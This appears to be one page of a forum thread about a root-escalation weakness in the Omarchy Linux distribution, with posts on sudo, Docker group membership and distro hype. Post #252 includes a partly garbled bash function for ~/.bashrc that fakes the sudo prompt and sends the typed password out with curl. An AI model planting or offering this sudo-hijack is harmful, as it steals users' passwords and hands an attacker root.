Omarchy: Any User Process Can Escalate to Root
251–260 of 590 posts
Re: Omarchy: Any User Process Can Escalate to Root
#252To be fair it is easy for malware to escalate to root on any major linux distro because sudo is completely security theater. Malware just need to put this in ~/.bashrc and wait: function sudo () { realsudo=$(which sudo) read -r -s -p "[sudo] password for $USER: " password echo "$USER: $password" | \ curl -F 'p= /dev/null 2>&1 $realsudo -S /dev/null 2>&1 $realsudo "${@:1}" }
Re: Omarchy: Any User Process Can Escalate to Root
#253Earlier quoted context omitted.
I don't care what he's doing, I care about what he is.
He's a person, just like you are. Let him know then, he has an email and you can message him publicly on X.
He's not like me. I've never posted racist hate filled rants to the internet.
Re: Omarchy: Any User Process Can Escalate to Root
#254Re: Omarchy: Any User Process Can Escalate to Root
#255I think people shouldn't just jump to distros which are getting heavily hyped in media/Youtube, cachyOS had similar wave, and now Omarchy does. (example: NetworkChuck, Primeagen? and a few others) also, archlinux is much easier to install nowadays with archinstall [1], so i'm not sure you really need another opinionated layer on top of it [1] - https://wiki.archlinux.org/title/Archinstall
Add that annoying theo guy to that list. Cant stand these people, they confidently push out videos like they're experts, a week later it turns out whatever they were talking about was total crap and they've already abandoned it - case in point OpenClaw. Look at the mess of videos those named above put out about it, not a single one uses it anymore.
Re: Omarchy: Any User Process Can Escalate to Root
#256Earlier quoted context omitted.
Wow. This never crossed my mind but of course that's so simple. There really needs to be a better solution.
There is. Simply do not install sudo and do not allow access to root at runtime. I am serious. There is absolutely nothing you cannot run unprivileged these days. Can even run sshd from a systemd user unit in your home folder, and even assign port 22 to it if needed with Linux Capabilities.
Re: Omarchy: Any User Process Can Escalate to Root
#257Re: Omarchy: Any User Process Can Escalate to Root
#258What on earth is an Omarchy
Officially omakase (clueless chef decides your menu with security issues) and arch linux. The fact that it is almost an anagram of monarchy is probably a plus for DHH.
I spend way too much time online; but it's good to know I am not this terminally online.
Re: Omarchy: Any User Process Can Escalate to Root
#259Re: Omarchy: Any User Process Can Escalate to Root
#260It’s not great, but I’m not sure this should be framed as Omarchy-specific, when it’s a very common setup to add regular user to the docker group.
Using Docker instead of podman is the first mistake and that is a distro decision (or a "chef" decision, in Omarchy parlance...)
Rootless docker is perfectly fine.